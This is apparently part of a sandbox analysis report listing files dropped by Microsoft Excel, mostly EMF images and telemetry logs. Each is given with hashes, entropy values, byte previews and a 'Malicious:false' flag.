                    Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):8184
                    Entropy (8bit):2.139796018041356
                    Encrypted:false
                    SSDEEP:96:EV5g2s88nDfgsRo5v9CWZBqlA2B79sIRdYZgmR7qii1Bo1V:EaofwWZC79FdigmR7qii1Bo
                    MD5:F51FE5344B566DD2D3CC97BB43307EAB
                    SHA1:7B9D3BCEDD619F87F6E71E2E830F62F7B341667B
                    SHA-256:A2F08D981F4917EA44AF6B813109EA7BB6CC4BEBF8FDA1728BC6DD53CCB40015
                    SHA-512:3F894000B0D464B71F7DF8075D8839F48911B19BE5DBDE40565651ED93C2B5BE75886C2C9924B81A8771E73B9BE1104B88F1ECFD540B1A055106F57A3622F34B
                    Malicious:false
                    Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):13372
                    Entropy (8bit):2.1473925042420063
                    Encrypted:false
                    SSDEEP:96:Xgk+uuuvSZbSG3+LB3mzlvpJbp0HWSj0ToYb4IzV:NGEmUj0/b9
                    MD5:40AE2474054CBA4DD18B28D539158E78
                    SHA1:1CACCDF691DB4A3362DF4C7115363BF6BAE19254
                    SHA-256:2ACE233DC0E2A94C44A4DCCFD6F7126A0B0CA8C10D79FB2FCF6654B1C49ED7AD
                    SHA-512:D0FC99B07C9345C8BF2360CE713088D5AAAEA81D960D5D5AB4B2B5964A2E7ECEA6DB557395D6E49AA2CD358B953594ABE0CAFEB70D7D35453E858D53E29FA14D
                    Malicious:false
                    Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i...........................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):149960
                    Entropy (8bit):2.364147876323635
                    Encrypted:false
                    SSDEEP:1536:5HR+z0eZQJYAkQDnGvVf1oLJknhmUI/FdOG:2H3G
                    MD5:AB78B9733990369B3E9DC0DD8C82B01A
                    SHA1:B81EA3B50DFF865B78090652590E956D01B09A03
                    SHA-256:DC05EBFF552FC321C95DAE1FCFCE52682AB2FBC1DD7F37E39A74CD33E4EE8F73
                    SHA-512:3E46A89C8B920B44E11DAD59A0E3073AB8F9106457AADC05344388D4D48EDC7DCDA05FC9F275B5636F58CB7FE8CFC1D2A418A06B395D47BE557268394590CFC9
                    Malicious:false
                    Preview:....l...........................Z....G.. EMF.....I..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):98872
                    Entropy (8bit):2.315181778019076
                    Encrypted:false
                    SSDEEP:768:XOIjvbx1DW7ohBb66mQK4BTonxqQbApQK6c:+awc
                    MD5:7E328FF1675F4035FD4012FA1A739859
                    SHA1:C3A9AE8FCF918AED84252E8920E9AE1685C9B9A8
                    SHA-256:46EC194B848F5709908BBB3E5DC445510A02FCE5EBEBF2DD3C49E60B99CB478C
                    SHA-512:D4A6D551A8D45FC0307B5A4554991B7F770E3BE2CE69B0008E51D161C4204E0CCEECB55529F16017FC422CA12DA58292A1E2A0B7D69A415E9E983227D2A69618
                    Malicious:false
                    Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):8208
                    Entropy (8bit):2.1398294191890463
                    Encrypted:false
                    SSDEEP:96:Eeg2s88nDfgQI5N9fWZBKlA2B79sIRdYZgmR7qii1Bo1V:E/ox7WZ4V79FdigmR7qii1Bo
                    MD5:657358BC46EB5EAC57B0EBD4CA37B569
                    SHA1:4E5EEFCF7279D596D9AA92DD2E767A98C71E5894
                    SHA-256:3D3C06A2F04678213C8BF0F34A64ED456BA00A4FBEC82ACF8D6850D67A9A3F09
                    SHA-512:0F06307262171B82301FEF2AD1C3A4CC549BC4577BB8908F40E881BA345732C4A822E5009286ED4B386B7A1A3E2F35896C377A43D52BA6753BF80E2C5D4F419E
                    Malicious:false
                    Preview:....l...........{...U............A...... EMF..... ..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):8184
                    Entropy (8bit):2.139796018041356
                    Encrypted:false
                    SSDEEP:96:EV5g2s88nDfgsRo5v9CWZBqlA2B79sIRdYZgmR7qii1Bo1V:EaofwWZC79FdigmR7qii1Bo
                    MD5:F51FE5344B566DD2D3CC97BB43307EAB
                    SHA1:7B9D3BCEDD619F87F6E71E2E830F62F7B341667B
                    SHA-256:A2F08D981F4917EA44AF6B813109EA7BB6CC4BEBF8FDA1728BC6DD53CCB40015
                    SHA-512:3F894000B0D464B71F7DF8075D8839F48911B19BE5DBDE40565651ED93C2B5BE75886C2C9924B81A8771E73B9BE1104B88F1ECFD540B1A055106F57A3622F34B
                    Malicious:false
                    Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):13372
                    Entropy (8bit):2.160795758936947
                    Encrypted:false
                    SSDEEP:96:Xgk+uuttT0UGv+0B3atldpJbp0HWSj0ToYb4IzV:QGfMSj0/b9
                    MD5:3916ABA74C162A2299A44A36C37A86D6
                    SHA1:55A8610B11C5563F87C409878A16FD2DD1561D60
                    SHA-256:8EA31523C9A5F647002F972EE947B7EFA5E382F367D0410C91BDBC354A44DC41
                    SHA-512:B403A4E36DB52A4ABCBA889ACA0A0A4CE818603CA97DA8B5BD8A4379209558AC16E8C1A3384EF35356A448C6503BE8736F8F33E7841A9A128C8FF4076FFA6A39
                    Malicious:false
                    Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i...........................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):13372
                    Entropy (8bit):2.1473925042420063
                    Encrypted:false
                    SSDEEP:96:Xgk+uuuvSZbSG3+LB3mzlvpJbp0HWSj0ToYb4IzV:NGEmUj0/b9
                    MD5:40AE2474054CBA4DD18B28D539158E78
                    SHA1:1CACCDF691DB4A3362DF4C7115363BF6BAE19254
                    SHA-256:2ACE233DC0E2A94C44A4DCCFD6F7126A0B0CA8C10D79FB2FCF6654B1C49ED7AD
                    SHA-512:D0FC99B07C9345C8BF2360CE713088D5AAAEA81D960D5D5AB4B2B5964A2E7ECEA6DB557395D6E49AA2CD358B953594ABE0CAFEB70D7D35453E858D53E29FA14D
                    Malicious:false
                    Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i...........................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):98872
                    Entropy (8bit):2.315181778019076
                    Encrypted:false
                    SSDEEP:768:XOIjvbx1DW7ohBb66mQK4BTonxqQbApQK6c:+awc
                    MD5:7E328FF1675F4035FD4012FA1A739859
                    SHA1:C3A9AE8FCF918AED84252E8920E9AE1685C9B9A8
                    SHA-256:46EC194B848F5709908BBB3E5DC445510A02FCE5EBEBF2DD3C49E60B99CB478C
                    SHA-512:D4A6D551A8D45FC0307B5A4554991B7F770E3BE2CE69B0008E51D161C4204E0CCEECB55529F16017FC422CA12DA58292A1E2A0B7D69A415E9E983227D2A69618
                    Malicious:false
                    Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):44256
                    Entropy (8bit):3.147465798679962
                    Encrypted:false
                    SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
                    MD5:36D8FF25D14E7E2FBB1968E952FF9C17
                    SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
                    SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
                    SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
                    Malicious:false
                    Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):13372
                    Entropy (8bit):2.1473925042420063
                    Encrypted:false
                    SSDEEP:96:Xgk+uuuvSZbSG3+LB3mzlvpJbp0HWSj0ToYb4IzV:NGEmUj0/b9
                    MD5:40AE2474054CBA4DD18B28D539158E78
                    SHA1:1CACCDF691DB4A3362DF4C7115363BF6BAE19254
                    SHA-256:2ACE233DC0E2A94C44A4DCCFD6F7126A0B0CA8C10D79FB2FCF6654B1C49ED7AD
                    SHA-512:D0FC99B07C9345C8BF2360CE713088D5AAAEA81D960D5D5AB4B2B5964A2E7ECEA6DB557395D6E49AA2CD358B953594ABE0CAFEB70D7D35453E858D53E29FA14D
                    Malicious:false
                    Preview:....l...........................|,..\... EMF....<4..O...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i...........................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):150296
                    Entropy (8bit):2.366927564562352
                    Encrypted:false
                    SSDEEP:1536:CHAe0p6eZQJYAkQDnGvVf1oLJknhmUI/Fc3I:hpRnI
                    MD5:811E56B7750FA327FF8894DBFE3B7FC0
                    SHA1:FBC3FD9923F42E6AFF9A776451E2F1EB3F015DB9
                    SHA-256:D47FD1693E7016B620B0F2E0D29ABA530FD3DBCB57ADE7B51E98814619535C1C
                    SHA-512:6D124FC8905E83601D5403E3FA501BB2F1204FCB09A20056311BE62B3BDDDDB00FEAE786671BF526719FAAF74F43CCBDA6EA67309B5532486BB99751CA9ADBC7
                    Malicious:false
                    Preview:....l...........................Z....G.. EMF.....K..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):13444
                    Entropy (8bit):2.1581245620306637
                    Encrypted:false
                    SSDEEP:96:tgk+uuVPZukH/GF+rB3YPlb3pJbp0HWSj0ToYb4IzV:qGCYlKj0/b9
                    MD5:11F3B1AFC8B93322F41B8E2976FA5232
                    SHA1:35C416E1D7D0047947F1D9C78245B39157ABBBC9
                    SHA-256:316316F41A3A8C59EFCAA2A1699D11329CE2C3B027EE0D690A4122EA2F3B3438
                    SHA-512:402CE17AD59EBABA5B8BA3314C4125003385AF0832DF2E409107B8A7309F0A15194724F316C38FBD05C1E78F63B6D45AFB0E32D359BE880D3391913CB9A1BE24
                    Malicious:false
                    Preview:....l...........................|,..\... EMF.....4..U...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i...........................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):44256
                    Entropy (8bit):3.15066292565687
                    Encrypted:false
                    SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
                    MD5:F1EC2E98B0F577B675156B13DCF94105
                    SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
                    SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
                    SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
                    Malicious:false
                    Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):99352
                    Entropy (8bit):2.3136165760823117
                    Encrypted:false
                    SSDEEP:768:hOk4vdB1DW7ohBb66mQK4BTonxqQbApQK6c:U5wc
                    MD5:544DC4FE93B389F51FB0324233EDEA41
                    SHA1:E0D276BE4EEE929F3C4A7DA5C2E02D1556C9EB55
                    SHA-256:626FB90E6606C22F739BA4F3085C2D763A7916694295E6B5B84443631A28A346
                    SHA-512:5B7045EB2E9903EC8E686F7DE1E5DF6165331E2C517CD1C3780CDDA10352E5C9E8EFD4F8578B50F0C461AF49C821C4D373693BB410F0652A0440139A09F5C4EA
                    Malicious:false
                    Preview:....l............................}...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):8084
                    Entropy (8bit):2.5551694039574895
                    Encrypted:false
                    SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
                    MD5:721E8AAC81F0A6D4659831CB8194D668
                    SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
                    SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
                    SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
                    Malicious:false
                    Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):153132
                    Entropy (8bit):2.3475145785826403
                    Encrypted:false
                    SSDEEP:1536:GAOsHV+DAtQaqrUPig97qG7bIQWkaYgJzQp:jdbp
                    MD5:00F44ACEBCC79C40BBC3A6DB23EDBD6E
                    SHA1:69E3D0D6E877268A1AC3C6FBB0DB83F62976EFB5
                    SHA-256:3376D5411FF0B0286D5BAF9323176C24B644BDDA527D9F661CE2C99E453E0877
                    SHA-512:6EB6034B264CC5174004E202365DC618815CA6ABCA8A72C9005E1A3F799E9EDE184DC7884B64B3741E4DD4B2F7B7E3E295434ED6CAD4D8DD1B83FAC82F8C6353
                    Malicious:false
                    Preview:....l...........................Z....G.. EMF....,V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):109544
                    Entropy (8bit):4.282675970330063
                    Encrypted:false
                    SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
                    MD5:F7B9A8F20E64B2CB6B572BCBA5866236
                    SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
                    SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
                    SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
                    Malicious:false
                    Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):38
                    Entropy (8bit):4.218469211370857
                    Encrypted:false
                    SSDEEP:3:XMzKXvwg3ekVR:wKoPg
                    MD5:747C4630DB2B517212CBB21C143BBCC0
                    SHA1:C6EF21A5467CEC5C604F2A1D74F3CA01FEA45766
                    SHA-256:9BECF04824FD08F7A82078A50CD483D16682F0F04FCABA8464E1AB64CF719283
                    SHA-512:195DE64DA15BD3E5731E0C2732565908765429C423D619E679F7D153493532CA37DF5D25D2F107CC960EACA037A27D6875E5C4192D85F01480CB8E757959558C
                    Malicious:false
                    Preview:Moved Permanently. Redirecting to /404
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):20971520
                    Entropy (8bit):8.112143835430977E-5
                    Encrypted:false
                    SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
                    MD5:AFDEAC461EEC32D754D8E6017E845D21
                    SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
                    SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
                    SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
                    Malicious:false
                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):20971520
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                    SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                    SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                    SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                    Malicious:false
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):71
                    Entropy (8bit):4.3462513114457515
                    Encrypted:false
                    SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
                    MD5:8F4510F128F81A8BAF2A345D00F7E30C
                    SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
                    SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
                    SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
                    Malicious:false
                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:ASCII text, with very long lines (28576), with CRLF line terminators
                    Category:dropped
                    Size (bytes):20971520
                    Entropy (8bit):0.21696248242958527
                    Encrypted:false
                    SSDEEP:1536:Fo7syyYhc8/nVAe2V5aX13oip+oiKYNXCCgVPLeq/9Rff/hYKCrYz4sfpNAiXSZO:WsFmnVx/4Yoa1JOmMzR9/FLY
                    MD5:D07DC7E4DE727FB61C2300FC33182E46
                    SHA1:51EF64B1AC92831A8C8D4EB3A5761E1D7465EB0B
                    SHA-256:4E8055B44D53E4254B3584D35023433A2C21EBA8E61A0A88C402CFC71A4C46C1
                    SHA-512:AD0C8A7DB505658D54DE01B71FCF3D2CE72BEBA7AD3A10069C65E95CA2AD299AC9A9EE06A64979FFB4FA074176D770C9B6DA28771B8DC21EF0D9B03145723A2B
                    Malicious:false
                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/20/2024 15:04:23.551.EXCEL (0x1AE8).0x2100.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2024-12-20T15:04:23.551Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-20T15:04:23.2549120Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-20T15:04:23.2549120Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-20T15:04:23.2549120Z\", \"C\" : \"\", \"Q\" : 15.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):20971520
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                    SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                    SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                    SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                    Malicious:false
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                    File Type:ASCII text, with very long lines (28774), with CRLF line terminators
                    Category:dropped
                    Size (bytes):567332
                    Entropy (8bit):5.31998672632733
                    Encrypted:false
                    SSDEEP:1536:F/usOVwKfqFKrcTGRH/kUPWan2sFmEKtDj1gYLuQ+xEhzeTMkR0HRXHJ/kDfab+8:csVKr7Z/kOj2xjce9/FLYICr8r
                    MD5:887CC9F2C5EC59B7F6E3762D520EC457
                    SHA1:87FD5D1926D041B7C64D4EF97EFB3A0952DAB8B8
                    SHA-256:88E16F411A10AFAEF81AD129D6CD26409028962D9796CD59F2C18068011F7028
                    SHA-512:D2519ADCF3D00BFD889E7BA0E031EAC3B519405F173EE5F0F36C00184E256224F9447B51B0F9A29052F3DB9C3B496FC931ADAE479AD04EEEBA4332550802D8C1
                    Malicious:false
